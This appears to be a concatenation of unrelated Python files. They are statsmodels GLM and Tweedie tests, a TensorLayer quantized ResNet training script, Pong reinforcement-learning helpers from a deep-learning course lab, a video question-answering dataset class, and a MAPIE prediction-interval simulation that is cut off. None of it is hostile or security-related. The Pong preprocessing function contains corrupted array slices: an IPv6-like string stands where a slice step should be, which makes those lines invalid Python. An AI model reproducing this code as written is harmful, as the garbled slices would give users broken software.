class TestTweedieSpecialLog1(CheckTweedieSpecial):
@classmethod
def setup_class(cls):
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family1 = sm.families.Poisson(link=sm.families.links.log())
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family1).fit()
family2 = sm.families.Tweedie(link=sm.families.links.log(),
var_power=1)
cls.res2 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family2).fit()
class TestTweedieSpecialLog2(CheckTweedieSpecial):
@classmethod
def setup_class(cls):
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family1 = sm.families.Gamma(link=sm.families.links.log())
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family1).fit()
family2 = sm.families.Tweedie(link=sm.families.links.log(),
var_power=2)
cls.res2 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family2).fit()
class TestTweedieSpecialLog3(CheckTweedieSpecial):
@classmethod
def setup_class(cls):
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family1 = sm.families.InverseGaussian(link=sm.families.links.log())
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family1).fit()
family2 = sm.families.Tweedie(link=sm.families.links.log(),
var_power=3)
cls.res2 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family2).fit()
@pytest.mark.filterwarnings("ignore:GLM ridge optimization")
def test_tweedie_EQL():
# All tests below are regression tests, but the results
# are very close to the population values.
np.random.seed(3242)
n = 500
p = 1.5 # Tweedie variance power
x = np.random.normal(size=(n, 4))
lpr = np.dot(x, np.r_[1, -1, 0, 0.5])
mu = np.exp(lpr)
lam = 10 * mu**(2 - p) / (2 - p)
alp = (2 - p) / (p - 1)
bet = 10 * mu**(1 - p) / (p - 1)
# Generate Tweedie values using commpound Poisson distribution
y = np.empty(n)
N = np.random.poisson(lam)
for i in range(n):
y[i] = np.random.gamma(alp, 1 / bet[i], N[i]).sum()
# Un-regularized fit using gradients not IRLS
fam = sm.families.Tweedie(var_power=p, eql=True)
model1 = sm.GLM(y, x, family=fam)
result1 = model1.fit(method="newton")
assert_allclose(result1.params,
np.array([1.00350497, -0.99656954, 0.00802702, 0.50713209]),
rtol=1e-5, atol=1e-5)
# Lasso fit using coordinate-wise descent
# TODO: The search gets trapped in an infinite oscillation, so use
# a slack convergence tolerance.
model2 = sm.GLM(y, x, family=fam)
result2 = model2.fit_regularized(L1_wt=1, alpha=0.07, maxiter=200,
cnvrg_tol=0.01)
rtol, atol = 1e-2, 1e-4
assert_allclose(result2.params,
np.array([1.00281192, -0.99182638, 0., 0.50448516]),
rtol=rtol, atol=atol)
# Series of ridge fits using gradients
ev = (np.array([1.001778, -0.99388, 0.00797, 0.506183]),
np.array([0.985841, -0.969124, 0.007319, 0.497649]),
np.array([0.206429, -0.164547, 0.000235, 0.102489]))
for j, alpha in enumerate([0.05, 0.5, 0.7]):
model3 = sm.GLM(y, x, family=fam)
result3 = model3.fit_regularized(L1_wt=0, alpha=alpha)
assert_allclose(result3.params, ev[j], rtol=rtol, atol=atol)
result4 = model3.fit_regularized(L1_wt=0, alpha=alpha * np.ones(x.shape[1]))
assert_allclose(result4.params, result3.params, rtol=rtol, atol=atol)
alpha = alpha * np.ones(x.shape[1])
alpha[0] = 0
result5 = model3.fit_regularized(L1_wt=0, alpha=alpha)
assert not np.allclose(result5.params, result4.params, rtol=rtol, atol=atol)
def test_tweedie_EQL_poisson_limit():
# Test the limiting Poisson case of the Nelder/Pregibon/Tweedie
# EQL.
np.random.seed(3242)
n = 500
x = np.random.normal(size=(n, 3))
x[:, 0] = 1
lpr = 4 + x[:, 1:].sum(1)
mn = np.exp(lpr)
y = np.random.poisson(mn)
for scale in 1.0, 'x2', 'dev':
# Un-regularized fit using gradients not IRLS
fam = sm.families.Tweedie(var_power=1, eql=True)
model1 = sm.GLM(y, x, family=fam)
result1 = model1.fit(method="newton", scale=scale)
# Poisson GLM
model2 = sm.GLM(y, x, family=sm.families.Poisson())
result2 = model2.fit(method="newton", scale=scale)
assert_allclose(result1.params, result2.params, atol=1e-6, rtol=1e-6)
assert_allclose(result1.bse, result2.bse, 1e-6, 1e-6)
def test_tweedie_EQL_upper_limit():
# Test the limiting case of the Nelder/Pregibon/Tweedie
# EQL with var = mean^2. These are tests against population
# values so accuracy is not high.
np.random.seed(3242)
n = 500
x = np.random.normal(size=(n, 3))
x[:, 0] = 1
lpr = 4 + x[:, 1:].sum(1)
mn = np.exp(lpr)
y = np.random.poisson(mn)
for scale in 'x2', 'dev', 1.0:
# Un-regularized fit using gradients not IRLS
fam = sm.families.Tweedie(var_power=2, eql=True)
model1 = sm.GLM(y, x, family=fam)
result1 = model1.fit(method="newton", scale=scale)
assert_allclose(result1.params, np.r_[4, 1, 1], atol=1e-3, rtol=1e-1)
def testTweediePowerEstimate():
# Test the Pearson estimate of the Tweedie variance and scale parameters.
#
# Ideally, this would match the following R code, but I cannot make it work...
#
# setwd('c:/workspace')
# data <- read.csv('cpunish.csv', sep=",")
#
# library(tweedie)
#
# y <- c(1.00113835e+05, 6.89668315e+03, 6.15726842e+03,
# 1.41718806e+03, 5.11776456e+02, 2.55369154e+02,
# 1.07147443e+01, 3.56874698e+00, 4.06797842e-02,
# 7.06996731e-05, 2.10165106e-07, 4.34276938e-08,
# 1.56354040e-09, 0.00000000e+00, 0.00000000e+00,
# 0.00000000e+00, 0.00000000e+00)
#
# data$NewY <- y
#
# out <- tweedie.profile( NewY ~ INCOME + SOUTH - 1,
# p.vec=c(1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8,
# 1.9), link.power=0,
# data=data,do.plot = TRUE)
data = cpunish.load_pandas()
y = [1.00113835e+05, 6.89668315e+03, 6.15726842e+03,
1.41718806e+03, 5.11776456e+02, 2.55369154e+02,
1.07147443e+01, 3.56874698e+00, 4.06797842e-02,
7.06996731e-05, 2.10165106e-07, 4.34276938e-08,
1.56354040e-09, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00]
model1 = sm.GLM(y, data.exog[['INCOME', 'SOUTH']],
family=sm.families.Tweedie(link=sm.families.links.log(),
var_power=1.5))
res1 = model1.fit()
model2 = sm.GLM((y - res1.mu) ** 2,
np.column_stack((np.ones(len(res1.mu)), np.log(res1.mu))),
family=sm.families.Gamma(sm.families.links.log()))
res2 = model2.fit()
# Sample may be too small for this...
# assert_allclose(res1.scale, np.exp(res2.params[0]), rtol=0.25)
p = model1.estimate_tweedie_power(res1.mu)
assert_allclose(p, res2.params[1], rtol=0.25)
def test_glm_lasso_6431():
# Based on issue #6431
# Fails with newton-cg as optimizer
np.random.seed(123)
from statsmodels.regression.linear_model import OLS
n = 50
x = np.ones((n, 2))
x[:, 1] = np.arange(0, n)
y = 1000 + x[:, 1] + np.random.normal(0, 1, n)
params = np.r_[999.82244338, 1.0077889]
for method in "bfgs", None:
for fun in [OLS, GLM]:
# Changing L1_wtValue from 0 to 1e-9 changes
# the algorithm from scipy gradient optimization
# to statsmodels coordinate descent
for L1_wtValue in [0, 1e-9]:
model = fun(y, x)
if fun == OLS:
fit = model.fit_regularized(alpha=0, L1_wt=L1_wtValue)
else:
fit = model._fit_ridge(alpha=0, start_params=None, method=method)
assert_allclose(params, fit.params, atol=1e-6, rtol=1e-6)
class TestRegularized(object):
def test_regularized(self):
import os
from .results import glmnet_r_results
for dtype in "binomial", "poisson":
cur_dir = os.path.dirname(os.path.abspath(__file__))
data = np.loadtxt(os.path.join(cur_dir, "results", "enet_%s.csv" % dtype),
delimiter=",")
endog = data[:, 0]
exog = data[:, 1:]
fam = {"binomial" : sm.families.Binomial,
"poisson" : sm.families.Poisson}[dtype]
for j in range(9):
vn = "rslt_%s_%d" % (dtype, j)
r_result = getattr(glmnet_r_results, vn)
L1_wt = r_result[0]
alpha = r_result[1]
params = r_result[2:]
model = GLM(endog, exog, family=fam())
sm_result = model.fit_regularized(L1_wt=L1_wt, alpha=alpha)
# Agreement is OK, see below for further check
assert_allclose(params, sm_result.params, atol=1e-2, rtol=0.3)
# The penalized log-likelihood that we are maximizing.
def plf(params):
llf = model.loglike(params) / len(endog)
llf = llf - alpha * ((1 - L1_wt)*np.sum(params**2) / 2 + L1_wt*np.sum(np.abs(params)))
return llf
# Confirm that we are doing better than glmnet.
llf_r = plf(params)
llf_sm = plf(sm_result.params)
assert_equal(np.sign(llf_sm - llf_r), 1)
class TestConvergence(object):
@classmethod
def setup_class(cls):
'''
Test Binomial family with canonical logit link using star98 dataset.
'''
from statsmodels.datasets.star98 import load
data = load(as_pandas=False)
data.exog = add_constant(data.exog, prepend=False)
cls.model = GLM(data.endog, data.exog,
family=sm.families.Binomial())
def _when_converged(self, atol=1e-8, rtol=0, tol_criterion='deviance'):
for i, dev in enumerate(self.res.fit_history[tol_criterion]):
orig = self.res.fit_history[tol_criterion][i]
new = self.res.fit_history[tol_criterion][i + 1]
if np.allclose(orig, new, atol=atol, rtol=rtol):
return i
raise ValueError('CONVERGENCE CHECK: It seems this doens\'t converge!')
def test_convergence_atol_only(self):
atol = 1e-8
rtol = 0
self.res = self.model.fit(atol=atol, rtol=rtol)
expected_iterations = self._when_converged(atol=atol, rtol=rtol)
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_convergence_rtol_only(self):
atol = 0
rtol = 1e-8
self.res = self.model.fit(atol=atol, rtol=rtol)
expected_iterations = self._when_converged(atol=atol, rtol=rtol)
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_convergence_atol_rtol(self):
atol = 1e-8
rtol = 1e-8
self.res = self.model.fit(atol=atol, rtol=rtol)
expected_iterations = self._when_converged(atol=atol, rtol=rtol)
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_convergence_atol_only_params(self):
atol = 1e-8
rtol = 0
self.res = self.model.fit(atol=atol, rtol=rtol, tol_criterion='params')
expected_iterations = self._when_converged(atol=atol, rtol=rtol,
tol_criterion='params')
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_convergence_rtol_only_params(self):
atol = 0
rtol = 1e-8
self.res = self.model.fit(atol=atol, rtol=rtol, tol_criterion='params')
expected_iterations = self._when_converged(atol=atol, rtol=rtol,
tol_criterion='params')
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_convergence_atol_rtol_params(self):
atol = 1e-8
rtol = 1e-8
self.res = self.model.fit(atol=atol, rtol=rtol, tol_criterion='params')
expected_iterations = self._when_converged(atol=atol, rtol=rtol,
tol_criterion='params')
actual_iterations = self.res.fit_history['iteration']
# Note the first value is the list is np.inf. The second value
# is the initial guess based off of start_params or the
# estimate thereof. The third value (index = 2) is the actual "first
# iteration"
assert_equal(expected_iterations, actual_iterations)
assert_equal(len(self.res.fit_history['deviance']) - 2,
actual_iterations)
def test_poisson_deviance():
# see #3355 missing term in deviance if resid_response.sum() != 0
np.random.seed(123987)
nobs, k_vars = 50, 3-1
x = sm.add_constant(np.random.randn(nobs, k_vars))
mu_true = np.exp(x.sum(1))
y = np.random.poisson(mu_true, size=nobs)
mod = sm.GLM(y, x[:, :], family=sm.genmod.families.Poisson())
res = mod.fit()
d_i = res.resid_deviance
d = res.deviance
lr = (mod.family.loglike(y, y+1e-20) -
mod.family.loglike(y, res.fittedvalues)) * 2
assert_allclose(d, (d_i**2).sum(), rtol=1e-12)
assert_allclose(d, lr, rtol=1e-12)
# case without constant, resid_response.sum() != 0
mod_nc = sm.GLM(y, x[:, 1:], family=sm.genmod.families.Poisson())
res_nc = mod_nc.fit()
d_i = res_nc.resid_deviance
d = res_nc.deviance
lr = (mod.family.loglike(y, y+1e-20) -
mod.family.loglike(y, res_nc.fittedvalues)) * 2
assert_allclose(d, (d_i**2).sum(), rtol=1e-12)
assert_allclose(d, lr, rtol=1e-12)
def test_non_invertible_hessian_fails_summary():
# Test when the hessian fails the summary is still available.
data = cpunish.load_pandas()
data.endog[:] = 1
with warnings.catch_warnings():
# we filter DomainWarning, the convergence problems
# and warnings in summary
warnings.simplefilter("ignore")
mod = sm.GLM(data.endog, data.exog, family=sm.families.Gamma())
res = mod.fit(maxiter=1, method='bfgs', max_start_irls=0)
res.summary()
|
<filename>tensorlayer/exp/exper_resnet.py
#! /usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
import tensorlayer as tl
bitW = 8
bitA = 8
tf.logging.set_verbosity(tf.logging.DEBUG)
tl.logging.set_verbosity(tl.logging.DEBUG)
sess = tf.InteractiveSession()
X_train, y_train, X_test, y_test = tl.files.load_cifar10_dataset(shape=(-1, 32, 32, 3), plotable=False)
def block(net, out_c, stride, reuse, is_train, bitW, bitA, name):
with tf.variable_scope(name, reuse=reuse):
residual = net
net = tl.layers.QuanConv2dWithBN(net, out_c, (3,3), (stride,stride), padding='SAME', act=tf.nn.relu, is_train=is_train, bitW=bitW, bitA=bitA)
net = tl.layers.QuanConv2dWithBN(net, out_c, (3,3), (1,1), padding='SAME', act=None, is_train=is_train, bitW=bitW, bitA=bitA)
net += residual
return tf.nn.relu(net)
def resnet18(x, y_, reuse, is_train, bitW, bitA):
with tf.variable_scope("resnet18", reuse=reuse):
net = tl.layers.InputLayer(x, name='input')
net = tl.layers.QuanConv2dWithBN(net, 64, (7,7), (2,2), padding='SAME', act=tf.nn.relu, is_train=is_train, bitW=bitW, bitA=bitA, name='res_quan1')
net = tl.layers.MaxPool2d(net, (3,3), (2,2), padding='SAME', name='res_pool1')
net = block(net, 64, 1, reuse, is_train, bitW, bitA, name='res_block1_1')
net = block(net, 64, 1, reuse, is_train, bitW, bitA, name='res_block1_2')
net = block(net, 128, 2, reuse, is_train, bitW, bitA, name='res_block2_1')
net = block(net, 128, 1, reuse, is_train, bitW, bitA, name='res_block2_2')
net = block(net, 256, 2, reuse, is_train, bitW, bitA, name='res_block3_1')
net = block(net, 256, 1, reuse, is_train, bitW, bitA, name='res_block3_2')
net = block(net, 512, 2,reuse, is_train, bitW, bitA, name='res_block4_1')
net = block(net, 512, 1, reuse, is_train, bitW, bitA, name='res_block4_2')
net = tl.layers.MeanPool2d(net, (7,7), (1,1), padding='VALID', name='res_pool2')
net = tl.layers.QuanDenseLayer(net, 1000, act=None, bitW=bitW, bitA=bitA, name='res_output')
y = net.outputs
ce = tl.cost.cross_entropy(y, y_, name='cost')
L2 = 0
for p in tl.layers.get_variables_with_name('relu/W', True, True):
L2 += tf.contrib.layers.l2_regularizer(0.004)(p)
cost = ce + L2
# correct_prediction = tf.equal(tf.argmax(tf.nn.softmax(y), 1), y_)
correct_prediction = tf.equal(tf.cast(tf.argmax(y, 1), tf.int64), y_)
acc = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
return net, cost, acc
def distort_fn(x, is_train=False):
x = tl.prepro.crop(x, 24, 24, is_random=is_train)
if is_train:
x = tl.prepro.flip_axis(x, axis=1, is_random=True)
x = tl.prepro.brightness(x, gamma=0.1, gain=1, is_random=True)
x = (x - np.mean(x)) / max(np.std(x), 1e-5) # avoid values divided by 0
return x
x = tf.placeholder(dtype=tf.float32, shape=[None, 24, 24, 3], name='x')
y_ = tf.placeholder(dtype=tf.int64, shape=[None], name='y_')
network, cost, _ = resnet18(x, y_, False, True, bitW=bitW, bitA=bitA)
_, cost_test, acc = resnet18(x, y_, True, False, bitW=bitW, bitA=bitA)
# train
n_epoch = 50000
learning_rate = 0.0001 #0.01 for alex
print_freq = 1
batch_size = 128
train_op = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-08,
use_locking=False).minimize(cost)
sess.run(tf.global_variables_initializer())
network.print_params(False)
network.print_layers()
print(' learning_rate: %f' % learning_rate)
print(' batch_size: %d' % batch_size)
print(' bitW: %d, bitA: %d' % (bitW, bitA))
for epoch in range(n_epoch):
start_time = time.time()
for X_train_a, y_train_a in tl.iterate.minibatches(X_train, y_train, batch_size, shuffle=True):
X_train_a = tl.prepro.threading_data(X_train_a, fn=distort_fn, is_train=True) # data augmentation for training
sess.run(train_op, feed_dict={x: X_train_a, y_: y_train_a})
if epoch + 1 == 1 or (epoch + 1) % print_freq == 0:
print("Epoch %d of %d took %fs" % (epoch + 1, n_epoch, time.time() - start_time))
test_loss, test_acc, n_batch = 0, 0, 0
for X_test_a, y_test_a in tl.iterate.minibatches(X_test, y_test, batch_size, shuffle=False):
X_test_a = tl.prepro.threading_data(X_test_a, fn=distort_fn, is_train=False) # central crop
err, ac = sess.run([cost_test, acc], feed_dict={x: X_test_a, y_: y_test_a})
test_loss += err
test_acc += ac
n_batch += 1
print(" test loss: %f" % (test_loss / n_batch))
print(" test acc: %f" % (test_acc / n_batch))
|
<filename>mitdeeplearning/lab3.py<gh_stars>1000+
import io
import base64
from IPython.display import HTML
import gym
import numpy as np
import cv2
def play_video(filename, width=None):
encoded = base64.b64encode(io.open(filename, 'r+b').read())
video_width = 'width="' + str(width) + '"' if width is not None else ''
embedded = HTML(data='''
<video controls {0}>
<source src="data:video/mp4;base64,{1}" type="video/mp4" />
</video>'''.format(video_width, encoded.decode('ascii')))
return embedded
def preprocess_pong(image):
I = image[35:195] # Crop
I = I[::2, fdf8:f53e:61e4::18, 0] # Downsample width and height by a factor of 2
I[I == 144] = 0 # Remove background type 1
I[I == 109] = 0 # Remove background type 2
I[I != 0] = 1 # Set remaining elements (paddles, ball, etc.) to 1
I = cv2.dilate(I, np.ones((3, 3), np.uint8), iterations=1)
I = I[::2, fdf8:f53e:61e4::18, np.newaxis]
return I.astype(np.float)
def pong_change(prev, curr):
prev = preprocess_pong(prev)
curr = preprocess_pong(curr)
I = prev - curr
# I = (I - I.min()) / (I.max() - I.min() + 1e-10)
return I
class Memory:
def __init__(self):
self.clear()
# Resets/restarts the memory buffer
def clear(self):
self.observations = []
self.actions = []
self.rewards = []
# Add observations, actions, rewards to memory
def add_to_memory(self, new_observation, new_action, new_reward):
self.observations.append(new_observation)
self.actions.append(new_action)
self.rewards.append(new_reward)
def aggregate_memories(memories):
batch_memory = Memory()
for memory in memories:
for step in zip(memory.observations, memory.actions, memory.rewards):
batch_memory.add_to_memory(*step)
return batch_memory
def parallelized_collect_rollout(batch_size, envs, model, choose_action):
assert len(envs) == batch_size, "Number of parallel environments must be equal to the batch size."
memories = [Memory() for _ in range(batch_size)]
next_observations = [single_env.reset() for single_env in envs]
previous_frames = [obs for obs in next_observations]
done = [False] * batch_size
rewards = [0] * batch_size
while True:
current_frames = [obs for obs in next_observations]
diff_frames = [pong_change(prev, curr) for (prev, curr) in zip(previous_frames, current_frames)]
diff_frames_not_done = [diff_frames[b] for b in range(batch_size) if not done[b]]
actions_not_done = choose_action(model, np.array(diff_frames_not_done), single=False)
actions = [None] * batch_size
ind_not_done = 0
for b in range(batch_size):
if not done[b]:
actions[b] = actions_not_done[ind_not_done]
ind_not_done += 1
for b in range(batch_size):
if done[b]:
continue
next_observations[b], rewards[b], done[b], info = envs[b].step(actions[b])
previous_frames[b] = current_frames[b]
memories[b].add_to_memory(diff_frames[b], actions[b], rewards[b])
if all(done):
break
return memories
def save_video_of_model(model, env_name, suffix=""):
import skvideo.io
from pyvirtualdisplay import Display
display = Display(visible=0, size=(400, 300))
display.start()
env = gym.make(env_name)
obs = env.reset()
prev_obs = obs
filename = env_name + suffix + ".mp4"
output_video = skvideo.io.FFmpegWriter(filename)
counter = 0
done = False
while not done:
frame = env.render(mode='rgb_array')
output_video.writeFrame(frame)
if "CartPole" in env_name:
input_obs = obs
elif "Pong" in env_name:
input_obs = pong_change(prev_obs, obs)
else:
raise ValueError(f"Unknown env for saving: {env_name}")
action = model(np.expand_dims(input_obs, 0)).numpy().argmax()
prev_obs = obs
obs, reward, done, info = env.step(action)
counter += 1
output_video.close()
print("Successfully saved {} frames into {}!".format(counter, filename))
return filename
def save_video_of_memory(memory, filename, size=(512,512)):
import skvideo.io
output_video = skvideo.io.FFmpegWriter(filename)
for observation in memory.observations:
output_video.writeFrame(cv2.resize(255*observation, size))
output_video.close()
return filename
|
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT license.
Video QA dataset
"""
import random
from torch.utils.data import Dataset
import torch
from torch.nn.utils.rnn import pad_sequence
from toolz.sandbox import unzip
import horovod.torch as hvd
from .data import (VideoFeatSubTokDataset, QaQueryTokLmdb,
get_ids_and_lens, video_collate, _check_ngpu,
txt_input_collate)
import math
class VideoQaDataset(Dataset):
def __init__(self, video_ids, video_db, query_db, max_num_query=5,
sampled_by_q=True):
assert isinstance(query_db, QaQueryTokLmdb)
assert isinstance(video_db, VideoFeatSubTokDataset)
self.video_db = video_db
self.query_db = query_db
self.vid2dur = self.video_db.vid2dur
self.vid2idx = self.video_db.vid2idx
self.max_clip_len = video_db.txt_db.max_clip_len
self.frame_interval = video_db.img_db.frame_interval
self.max_num_query = max_num_query
self.sampled_by_q = sampled_by_q
self.vids = video_ids
if sampled_by_q:
self.lens, self.qids = get_ids_and_lens(query_db)
# FIXME
if _check_ngpu() > 1:
# partition data by rank
self.qids = self.qids[hvd.rank()::hvd.size()]
self.lens = self.lens[hvd.rank()::hvd.size()]
else:
# FIXME
if _check_ngpu() > 1:
# partition data by rank
self.vids = self.vids[hvd.rank()::hvd.size()]
self.lens = [video_db.txt_db.id2len[vid] for vid in self.vids]
def getids(self, i):
if not self.sampled_by_q:
vid = self.vids[i]
# TVR video loss assumes fix number of queries
qids = self.query_db.video2query[vid][:self.max_num_query]
if len(qids) < self.max_num_query:
qids += random.sample(qids, self.max_num_query - len(qids))
else:
qids = [self.qids[i]]
vid = self.query_db.query2video[qids[0]]
return vid, qids
def __getitem__(self, i):
vid, qids = self.getids(i)
video_inputs = self.video_db.__getitem__(vid)
(frame_level_input_ids, frame_level_v_feats,
frame_level_attn_masks,
clip_level_v_feats, clip_level_attn_masks, num_subs,
sub_idx2frame_idx) = video_inputs
nframes = len(clip_level_v_feats)
all_vids = []
all_targets = []
all_ts_targets = []
all_qa_input_ids = []
all_qa_attn_masks = []
all_video_qa_inputs = []
for qid in qids:
example = self.query_db[qid]
if example['target'] is not None:
target = torch.LongTensor([example['target']])
else:
target = torch.LongTensor([-1])
if example['ts'] is not None:
st_idx, ed_idx = self.get_st_ed_label(
example['ts'], max_idx=nframes-1)
ts_target = torch.LongTensor(
[st_idx, ed_idx])
else:
ts_target = torch.LongTensor([-1, -1])
input_ids = example["input_ids"]
q_input_ids = input_ids[0]
for a_input_ids in input_ids[1:]:
f_sub_qa_input_ids = []
f_sub_qa_attn_masks = []
curr_qa_input_id = torch.tensor(
[self.query_db.sep] + q_input_ids + [
self.query_db.sep] + a_input_ids)
curr_qa_attn_masks = torch.tensor([1]*len(curr_qa_input_id))
all_qa_input_ids.append(curr_qa_input_id)
all_qa_attn_masks.append(curr_qa_attn_masks)
for f_sub_input_ids, f_attn_masks in zip(
frame_level_input_ids, frame_level_attn_masks):
curr_f_sub_qa_input_ids = torch.cat((
f_sub_input_ids, curr_qa_input_id))
curr_f_sub_qa_attn_masks = torch.cat((
f_attn_masks, curr_qa_attn_masks))
f_sub_qa_input_ids.append(curr_f_sub_qa_input_ids)
f_sub_qa_attn_masks.append(curr_f_sub_qa_attn_masks)
curr_video_qa_inputs = (
f_sub_qa_input_ids, frame_level_v_feats,
f_sub_qa_attn_masks,
clip_level_v_feats, clip_level_attn_masks, num_subs,
sub_idx2frame_idx)
all_video_qa_inputs.append(curr_video_qa_inputs)
all_vids.append(vid)
all_targets.append(target)
all_ts_targets.append(ts_target)
out = (all_video_qa_inputs, all_qa_input_ids, all_qa_attn_masks,
all_vids, all_targets, all_ts_targets)
return out
def __len__(self):
if self.sampled_by_q:
return len(self.qids)
return len(self.vids)
def get_st_ed_label(self, ts, max_idx):
"""
Args:
ts: [st (float), ed (float)] in seconds, ed > st
max_idx: length of the video
Returns:
[st_idx, ed_idx]: int,
Given ts = [3.2, 7.6], st_idx = 2, ed_idx = 6,
clips should be indexed as [2: 6),
the translated back ts should be [3:9].
# TODO which one is better, [2: 5] or [2: 6)
"""
try:
ts = ts.split("-")
st = float(ts[0])
ed = float(ts[1])
st_idx = min(math.floor(st/self.frame_interval), max_idx)
ed_idx = min(max(math.ceil(ed/self.frame_interval)-1,
st_idx+1), max_idx)
except Exception:
st_idx, ed_idx = -1, -1
return st_idx, ed_idx
def video_qa_collate(inputs):
(video_qa_inputs, qa_input_ids, qa_attn_masks,
vids, target, ts_target) = map(
list, unzip(inputs))
all_video_qa_inputs = []
all_target, all_ts_target = [], []
all_qa_input_ids, all_qa_attn_masks = [], []
for i in range(len(video_qa_inputs)):
all_video_qa_inputs.extend(video_qa_inputs[i])
all_qa_input_ids.extend(qa_input_ids[i])
all_qa_attn_masks.extend(qa_attn_masks[i])
for j in range(len(vids)):
all_target.extend(target[j])
all_ts_target.extend(ts_target[j])
batch = video_collate(all_video_qa_inputs)
targets = pad_sequence(
all_target, batch_first=True, padding_value=-1)
ts_targets = pad_sequence(
all_ts_target, batch_first=True, padding_value=-1)
input_ids, pos_ids, attn_masks =\
txt_input_collate(all_qa_input_ids, all_qa_attn_masks)
batch["targets"] = targets
batch["ts_targets"] = ts_targets
batch['qa_input_ids'] = input_ids
batch['qa_pos_ids'] = pos_ids
batch['qa_attn_masks'] = attn_masks
return batch
class VideoQaEvalDataset(VideoQaDataset):
def __getitem__(self, i):
vid, qids = self.getids(i)
outs = super().__getitem__(i)
return qids, outs
def video_qa_eval_collate(inputs):
qids, batch = [], []
for id_, tensors in inputs:
qids.extend(id_)
batch.append(tensors)
batch = video_qa_collate(batch)
batch['qids'] = qids
return batch
|
"""
============================================================
Reproducing the simulations from Foygel-Barber et al. (2020)
============================================================
:class:`mapie.estimators.MapieRegressor` is used to investigate
the coverage level and the prediction interval width as function
of the dimension using simulated data points as introduced in
Foygel-Barber et al. (2020).
This simulation generates several times linear data with random noise
whose signal-to-noise is equal to 10 and for several given dimensions.
Here we use MAPIE, with a LinearRegression base model, to estimate the width
means and the coverage levels of the prediction intervals estimated by all the
available methods as function of the dataset dimension.
We then show the prediction interval coverages and widths as function of the
dimension values for selected methods with standard error given by the different trials.
This simulation is carried out to emphasize the instability of the prediction
intervals estimated by the Jackknife method when the dataset dimension is
equal to the number of training samples (here 100).
"""
from typing import List, Dict
import numpy as np
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot as plt
from mapie.estimators import MapieRegressor
from mapie.metrics import coverage_score
def PIs_vs_dimensions(
methods: List[str],
alpha: float,
n_trial: int,
dimensions: List[int]
) -> Dict[str, Dict[int, Dict[str, np.ndarray]]]:
"""
Compute the prediction intervals for a linear regression problem.
Function adapted from Foygel-Barber et al. (2020).
It generates several times linear data with random noise whose signal-to-noise
is equal to 10 and for several given dimensions, given by the dimensions list.
Here we use MAPIE, with a LinearRegression base model, to estimate the width
means and the coverage levels of the prediction intervals estimated by all the
available methods as function of the dataset dimension.
This simulation is carried out to emphasize the instability of the prediction
intervals estimated by the Jackknife method when the dataset dimension is
equal to the number of training samples (here 100).
Parameters
----------
methods : List[str]
List of methods for estimating prediction intervals.
alpha : float
1 - (target coverage level).
n_trial : int
Number of trials for each dimension for estimating prediction intervals.
For each trial, a new random noise is generated.
dimensions : List[int]
List of dimension values of input data.
Returns
-------
Dict[str, Dict[int, Dict[str, np.ndarray]]]
Prediction interval widths and coverages for each method, trial,
and dimension value.
"""
n_train = 100
n_test = 100
SNR = 10
results: Dict[str, Dict[int, Dict[str, np.ndarray]]] = {
method: {
dimension: {
"coverage": np.empty(n_trial),
"width_mean": np.empty(n_trial)
} for dimension in dimensions
} for method in methods
}
for dimension in dimensions:
for trial in range(n_trial):
beta = np.random.normal(size=dimension)
beta_norm = np.sqrt((beta**2).sum())
beta = beta/beta_norm*np.sqrt(SNR)
X_train = np.random.normal(size=(n_train, dimension))
noise_train = np.random.normal(size=n_train)
noise_test = np.random.normal(size=n_test)
y_train = X_train.dot(beta) + noise_train
X_test = np.random.normal(size=(n_test, dimension))
y_test = X_test.dot(beta) + noise_test
for method in methods:
mapie = MapieRegressor(
LinearRegression(),
alpha=alpha,
method=method,
n_splits=5,
shuffle=False,
return_pred="ensemble"
)
mapie.fit(X_train, y_train)
y_preds = mapie.predict(X_test)
